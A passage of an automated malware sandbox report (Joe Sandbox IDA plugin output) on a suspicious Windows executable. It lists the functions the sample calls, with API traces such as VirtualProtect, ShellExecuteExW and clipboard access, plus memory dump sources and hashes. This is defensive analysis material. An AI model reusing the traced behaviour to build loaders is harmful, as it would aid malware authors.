                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403430,000000FF,0041EA20,?,0041EA20,?,?,00000004,00000000), ref: 00405FCD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                • Instruction ID: c6b158df49e6f5968e08b93a39371abef257cf80c9060b8b5a86bf4d0676d75d
                                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                • Instruction Fuzzy Hash: 1FE0EC3225065AABDF109E669C04EEB7B6CEB053A0F004837FA55E3190D635E821DBA4
                                                                Function 6EDF29DF Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualProtect.KERNELBASE(6EDF505C,00000004,00000040,6EDF504C), ref: 6EDF29FD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1649696285.000000006EDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EDF0000, based on PE: true
                                                                • Associated: 00000000.00000002.1649673053.000000006EDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649710611.000000006EDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649724182.000000006EDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6edf0000_No.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: e15311509b660e96a1fbe37fd5626a095ea6876436e013fcc3f1817fcbc2591c
                                                                • Instruction ID: 7caf846a844c76beef6c8006a7fcf44781e748f1b27830178402e45a63445c23
                                                                • Opcode Fuzzy Hash: e15311509b660e96a1fbe37fd5626a095ea6876436e013fcc3f1817fcbc2591c
                                                                • Instruction Fuzzy Hash: A8F0A5B1954A80EEEB50CF78A444B093FE0B70A304F12C52AE14BD6240E3344D4BCB95
                                                                Function 004023EC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040241D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfileString
                                                                • String ID:
                                                                • API String ID: 1096422788-0
                                                                • Opcode ID: f55628d4b7fc1c3702899dee1337003f381c7036a296fbc4314416ebe8ce5134
                                                                • Instruction ID: 84a3be15b77accaad8f92e5f77cb7225a0a8ac318d6267ea73d07213f2db240d
                                                                • Opcode Fuzzy Hash: f55628d4b7fc1c3702899dee1337003f381c7036a296fbc4314416ebe8ce5134
                                                                • Instruction Fuzzy Hash: D3E04F30800219AADB00AFA0CE09EAE3769BF00300F10093AF520BB0D1E7FC89409749
                                                                Function 0040627E Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C248,?,?,0040630C,0042C248,00000000,?,?,Call,?), ref: 004062A2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                • API String ID: 71445658-0
                                                                • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                • Instruction ID: 30c71471ac55a0486040fafebf39dce1c160f5eedd86b0188f7d98683811911a
                                                                • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                • Instruction Fuzzy Hash: 45D0123254020DBBEF11AF90ED01FAB375DAB08351F01442AFE16A4091D775D530A724
                                                                Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 6b1ab73fd8eff285d918823dc1170c24360cfb5c9671e6d3e0b8c01c80aedfbb
                                                                • Instruction ID: a93de1ea602b80332484b308aebd2b3b1e31a5c4c7fa674852030dd18b7254c5
                                                                • Opcode Fuzzy Hash: 6b1ab73fd8eff285d918823dc1170c24360cfb5c9671e6d3e0b8c01c80aedfbb
                                                                • Instruction Fuzzy Hash: AAD01772B041049BCB00DFA9AA48A9E73B0EF64328B308537D121F21D0D6F899419A29
                                                                Function 0040347D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 0040348B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: FilePointer
                                                                • String ID:
                                                                • API String ID: 973152223-0
                                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                Function 00405A3D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShellExecuteExW.SHELL32(?), ref: 00405A4C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID:
                                                                • API String ID: 587946157-0
                                                                • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                                                • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                                                Function 0040439C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: f5bdca1a155d9e49db802200bf92d6fca10bad1793e20f26dfe4708f9af3b7d1
                                                                • Instruction ID: 48b894a6b6243f55f811ea40c192212472d129cd546c7318a3a4cbaf3ee199e0
                                                                • Opcode Fuzzy Hash: f5bdca1a155d9e49db802200bf92d6fca10bad1793e20f26dfe4708f9af3b7d1
                                                                • Instruction Fuzzy Hash: EFD05E73A201009BC700DFB8BE8545E73B8EA903293304837D442E20D1E6B898418628
                                                                Function 6EDF121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GlobalAlloc.KERNELBASE(00000040,?,6EDF123B,?,6EDF12DF,00000019,6EDF11BE,-000000A0), ref: 6EDF1225
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1649696285.000000006EDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EDF0000, based on PE: true
                                                                • Associated: 00000000.00000002.1649673053.000000006EDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649710611.000000006EDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649724182.000000006EDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6edf0000_No.jbxd
                                                                Similarity
                                                                • API ID: AllocGlobal
                                                                • String ID:
                                                                • API String ID: 3761449716-0
                                                                • Opcode ID: 5fcc3658a74f8966033fd7ddb44936adc94d411d2bf4dbe730f5fa8c2acd8c30
                                                                • Instruction ID: 21a4937ec5e5d7f1239e7a04a6cead764a7be56a6265017a15552d101a1186ef
                                                                • Opcode Fuzzy Hash: 5fcc3658a74f8966033fd7ddb44936adc94d411d2bf4dbe730f5fa8c2acd8c30
                                                                • Instruction Fuzzy Hash: 27B001B1A44900FFFE40DBA8EE4BF3936A8EB46706F488050FA06D5285D6649D168A79

                                                                Non-executed Functions

                                                                Function 004055B8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,00000403), ref: 00405616
                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405625
                                                                • GetClientRect.USER32(?,?), ref: 00405662
                                                                • GetSystemMetrics.USER32(00000002), ref: 00405669
                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040568A
                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040569B
                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004056AE
                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004056BC
                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056CF
                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056F1
                                                                • ShowWindow.USER32(?,00000008), ref: 00405705
                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405726
                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405736
                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040574F
                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040575B
                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405634
                                                                  • Part of subcall function 0040439C: SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA
                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405778
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000554C,00000000), ref: 00405786
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040578D
                                                                • ShowWindow.USER32(00000000), ref: 004057B1
                                                                • ShowWindow.USER32(00000000,00000008), ref: 004057B6
                                                                • ShowWindow.USER32(00000008), ref: 00405800
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405834
                                                                • CreatePopupMenu.USER32 ref: 00405845
                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405859
                                                                • GetWindowRect.USER32(?,?), ref: 00405879
                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405892
                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058CA
                                                                • OpenClipboard.USER32(00000000), ref: 004058DA
                                                                • EmptyClipboard.USER32 ref: 004058E0
                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058EC
                                                                • GlobalLock.KERNEL32(00000000), ref: 004058F6
                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040590A
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040592A
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405935
                                                                • CloseClipboard.USER32 ref: 0040593B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                • String ID: {
                                                                • API String ID: 590372296-366298937
                                                                • Opcode ID: 8f25bff0f06489f7a1a8ce70ca033e140048c00b36b59f282442a9f3d67c4887
                                                                • Instruction ID: ef42e6e7ad26681d1de71b6013131fdd69d98400fc0f56e042e978cac442fd71
                                                                • Opcode Fuzzy Hash: 8f25bff0f06489f7a1a8ce70ca033e140048c00b36b59f282442a9f3d67c4887
                                                                • Instruction Fuzzy Hash: 45B138B1900608FFDB11AFA0DE85AAE7B79FB44355F00803AFA41B61A0CB755E51DF68
                                                                Function 00404858 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003FB), ref: 004048A7
                                                                • SetWindowTextW.USER32(00000000,?), ref: 004048D1
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404982
                                                                • CoTaskMemFree.OLE32(00000000), ref: 0040498D
                                                                • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 004049BF
                                                                • lstrcatW.KERNEL32(?,Call), ref: 004049CB
                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049DD
                                                                  • Part of subcall function 00405A5B: GetDlgItemTextW.USER32(?,?,00000400,00404A14), ref: 00405A6E
                                                                  • Part of subcall function 004066C0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\No. 1349240400713.exe",004034A0,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406723
                                                                  • Part of subcall function 004066C0: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406732
                                                                  • Part of subcall function 004066C0: CharNextW.USER32(?,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\No. 1349240400713.exe",004034A0,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00406737
                                                                  • Part of subcall function 004066C0: CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\No. 1349240400713.exe",004034A0,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 0040674A
                                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404AA0
                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404ABB
                                                                  • Part of subcall function 00404C14: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CB5
                                                                  • Part of subcall function 00404C14: wsprintfW.USER32 ref: 00404CBE
                                                                  • Part of subcall function 00404C14: SetDlgItemTextW.USER32(?,0042D268), ref: 00404CD1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: A$C:\Users\user\udstrmningsdysernes\eir\Speckly$Call
                                                                • API String ID: 2624150263-2273020108
                                                                • Opcode ID: 853e4702587f22a3b0095dfd1c3f762452952fa67d6f0456fc7ffaafa7f78d96
                                                                • Instruction ID: 0d1333b798dde08b2b35772059431d035751c92a28532a026af6b574b599a32b
                                                                • Opcode Fuzzy Hash: 853e4702587f22a3b0095dfd1c3f762452952fa67d6f0456fc7ffaafa7f78d96
                                                                • Instruction Fuzzy Hash: 56A15EF1A00209ABDB11AFA5CD45AAFB7B8EF84314F10843BF601B62D1D77C99418B6D
                                                                Function 00406C81 Relevance: .3, Instructions: 334COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
